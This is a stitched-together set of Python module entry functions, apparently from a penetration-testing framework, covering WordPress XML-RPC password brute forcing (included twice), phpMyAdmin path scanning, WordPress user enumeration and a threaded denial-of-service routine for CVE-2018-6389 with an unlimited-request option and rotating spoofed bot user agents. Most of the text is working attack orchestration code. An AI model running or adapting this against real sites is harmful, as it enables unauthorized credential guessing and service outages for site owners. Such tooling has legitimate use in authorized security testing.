def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type( target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = [ "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5", "Googlebot/2.1 ( http://www.googlebot.com/bot.html)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04" " Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13", "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)", "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51", "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620", "Debian APT-HTTP/1.3 (0.8.10.3)", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Googlebot/2.1 (+http://www.googlebot.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; " "http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)", "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)", "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" ] headers = { 'User-agent': random.choice(user_agent_list), 'Content-Type': 'text/xml' } # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement] extra_requirements = new_extra_requirements threads = [] if users is None: users = extra_requirements["wp_users"] if passwds is None: passwds = extra_requirements["wp_passwds"] if ports is None: ports = extra_requirements["wp_xmlrpc_brute_ports"] if verbose_level > 3: total_req = len(users) * len(passwds) * len(ports) else: total_req = len(users) * len(passwds) * len(ports) thread_tmp_filename = '{}/tmp/thread_tmp_'.format( load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) != "HTTP": target = 'https://' + target for port in ports: if test(str(target), port, retries, timeout_sec, headers, socks_proxy, verbose_level, trying, total_req, total, num, language) is True: keyboard_interrupt_flag = False for user in users: for passwd in passwds: #print(user + " " + passwd) t = threading.Thread( target=check, args=(user, passwd, target, port, headers, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info( messages(language, "trying_message").format( trying, total_req, num, total, target_to_host(target), port, 'wp_xmlrpc_brute')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break else: warn(messages(language, "open_error").format(target)) # wait for threads kill_switch = 0 kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() is 1 or kill_switch is kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) os.remove(thread_tmp_filename) else: warn( messages(language, "input_target_error").format('wp_xmlrpc_brute', target))
def start( target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd, ): # Main function if ( target_type(target) != "SINGLE_IPv4" or target_type(target) != "DOMAIN" or target_type(target) != "HTTP" or target_type(target) != "SINGLE_IPv6" ): # rand useragent http_methods = ["GET", "HEAD"] # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement ] extra_requirements = new_extra_requirements if extra_requirements["pma_scan_http_method"][0] not in http_methods: warn(messages(language, "dir_scan_get")) extra_requirements["pma_scan_http_method"] = ["GET"] thread_tmp_filename = "{}/tmp/thread_tmp_".format( load_file_path() ) + "".join( random.choice(string.ascii_letters + string.digits) for _ in range(20) ) __log_into_file(thread_tmp_filename, "w", "1", language) default_ports = [80, 443] request = """{0} __target_locat_here__{{0}} \ HTTP/1.1\nUser-Agent: {1}\n\n""".format( extra_requirements["pma_scan_http_method"][0], random.choice(useragents.useragents()) if extra_requirements["pma_scan_random_agent"][0].lower() == "true" else "Mozilla/5.0 (Windows; U; Windows NT 5.1; \ en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5", ) status_codes = [200, 401, 403] condition = "response.status_code in {0}".format(status_codes) message = messages(language, "found") sample_message = ( '"' + message + '"' + """.format(response.url, response.status_code,\ response.reason)""" ) sample_event = { "HOST": target_to_host(target), "USERNAME": "", "PASSWORD": "", "PORT": "PORT", "TYPE": "pma_scan", "DESCRIPTION": sample_message, "TIME": now(), "CATEGORY": "scan", "SCAN_ID": scan_id, "SCAN_CMD": scan_cmd, } counter_message = messages(language, "phpmyadmin_dir_404") __repeater( request, [extra_requirements["pma_scan_list"]], timeout_sec, thread_number, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, scan_id, scan_cmd, condition, thread_tmp_filename, sample_event, sample_message, target, ports, default_ports, counter_message, ) else: warn( messages(language, "input_target_error").format("pma_scan", target) )
def start( target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd, ): # Main function if (target_type(target) != "SINGLE_IPv4" or target_type(target) != "DOMAIN" or target_type(target) != "HTTP"): # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement] extra_requirements = new_extra_requirements if ports is None: ports = extra_requirements["wp_user_enum_ports"] if target_type(target) == "HTTP": target = target_to_host(target) threads = [] total_req = len(ports) thread_tmp_filename = "{}/tmp/thread_tmp_".format( load_file_path()) + "".join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, "w", "1", language) trying = 0 keyboard_interrupt_flag = False for port in ports: port = int(port) t = threading.Thread( target=__wp_user_enum, args=( target, int(port), timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd, ), ) threads.append(t) t.start() trying += 1 if verbose_level > 3: info( messages(language, "trying_message").format( trying, total_req, num, total, target, port, "wp_user_enum_scan", )) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break # wait for threads kill_switch = 0 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 1: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write == 1 and verbose_level != 0: info(messages(language, "not_found")) data = json.dumps({ "HOST": target, "USERNAME": "", "PASSWORD": "", "PORT": "", "TYPE": "wp_user_enum_scan", "DESCRIPTION": messages(language, "not_found"), "TIME": now(), "CATEGORY": "scan", "SCAN_ID": scan_id, "SCAN_CMD": scan_cmd, }) __log_into_file(log_in_file, "a", data, language) os.remove(thread_tmp_filename) else: warn( messages(language, "input_target_error").format("wp_user_enum_scan", target))
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type( target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = useragents.useragents() headers = { 'User-agent': random.choice(user_agent_list), 'Content-Type': 'text/xml' } # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement] extra_requirements = new_extra_requirements threads = [] if users is None: users = extra_requirements["wp_users"] if passwds is None: passwds = extra_requirements["wp_passwds"] if ports is None: ports = extra_requirements["wp_xmlrpc_brute_ports"] if verbose_level > 3: total_req = len(users) * len(passwds) * len(ports) else: total_req = len(users) * len(passwds) * len(ports) thread_tmp_filename = '{}/tmp/thread_tmp_'.format( load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) != "HTTP": target = 'https://' + target for port in ports: if test(str(target), port, retries, timeout_sec, headers, socks_proxy, verbose_level, trying, total_req, total, num, language) is True: keyboard_interrupt_flag = False for user in users: for passwd in passwds: #print(user + " " + passwd) t = threading.Thread( target=check, args=(user, passwd, target, port, headers, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info( messages(language, "trying_message").format( trying, total_req, num, total, target_to_host(target), port, 'wp_xmlrpc_brute')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break else: warn(messages(language, "open_error").format(target)) # wait for threads kill_switch = 0 kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 1 or kill_switch == kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) os.remove(thread_tmp_filename) else: warn( messages(language, "input_target_error").format('wp_xmlrpc_brute', target))
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type( target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = useragents.useragents() user_agent = {'User-agent': random.choice(user_agent_list)} limit = 1000 # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement] extra_requirements = new_extra_requirements random_agent_flag = True if extra_requirements["wordpress_dos_cve_2018_6389_vuln_random_agent"][ 0] != "True": random_agent_flag = False if extra_requirements["wordpress_dos_cve_2018_6389_vuln_no_limit"][ 0] != "False": limit = -1 threads = [] total_req = limit filepath = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) thread_tmp_filename = '{}/tmp/thread_tmp_'.format( load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) == 'SINGLE_IPv4' or target_type( target) == 'DOMAIN': url = 'http://{0}/'.format(target) else: if target.count(':') > 1: __die_failure(messages(language, "insert_port_message")) http = target.rsplit('://')[0] host = target_to_host(target) path = "/".join( target.replace('http://', '').replace('https://', '').rsplit('/')[1:]) url = http + '://' + host + '/' + path if test(url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num, language, False, log_in_file, scan_id, scan_cmd, thread_tmp_filename) != 0: warn(messages(language, "open_error").format(url)) return info(messages(language, "DOS_send").format(target)) n = 0 t = threading.Thread( target=test, args=(url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num, language, True, log_in_file, scan_id, scan_cmd, thread_tmp_filename)) t.start() keyboard_interrupt_flag = False while (n != limit): n += 1 if random_agent_flag: user_agent = {'User-agent': random.choice(user_agent_list)} t = threading.Thread(target=send_dos, args=(url, user_agent, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info( messages(language, "trying_message").format( trying, total_req, num, total, target_to_host(target), port, 'wordpress_dos_cve_2018_6389_vuln')) try: if int(open(thread_tmp_filename).read().rsplit()[0]) == 0: if limit != -1: break except Exception: pass while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break # wait for threads kill_switch = 0 kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 2 or kill_switch == kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write == 1: info( messages(language, "no_vulnerability_found").format( "wordpress_dos_cve_2018_6389_vuln")) if verbose_level != 0: data = json.dumps({ 'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wordpress_dos_cve_2018_6389_vuln', 'DESCRIPTION': messages(language, "no_vulnerability_found").format( "wordpress_dos_cve_2018_6389_vuln"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd }) __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) else: warn( messages(language, "input_target_error").format( 'wordpress_dos_cve_2018_6389_vuln', target))